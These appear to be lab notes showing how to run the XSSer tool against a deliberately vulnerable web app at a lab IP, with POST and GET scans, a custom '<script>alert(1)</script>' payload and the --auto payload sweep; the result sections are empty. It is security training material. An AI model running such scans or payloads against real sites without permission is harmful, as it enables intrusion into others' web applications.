• Installation
• To use GUI version of Xsser

POST Request

1. Basic Attack

   xsser --url '<http://192.94.37.3/index.php?page=dns-lookup.php>' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
   

   • Result

   <aside> 💡 We can not use the above payload, because its not a legitimate payload.

   </aside>

2. Using our own custom XSS payload.

   xsser --url '[<http://192.94.37.3/index.php?page=dns-lookup.php>](<http://192.94.37.3/index.php?page=dns-lookup.php>)' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"
   

   • Result

3. Trying various or all XSS payloads provided by XSSer's “--auto” option

   xsser --url '[<http://192.94.37.3/index.php?page=dns-lookup.php>](<http://192.94.37.3/index.php?page=dns-lookup.php>)' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto
   

   • Result

GET Request

1. Basic Attack

   xsser --url “<http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-po> ll-php-submit-button=Submit+Vote”
   

   • Result

2. Using our own custom XSS payload to XSSer

   xsser --url "<http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-po> ll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"
   

   • Result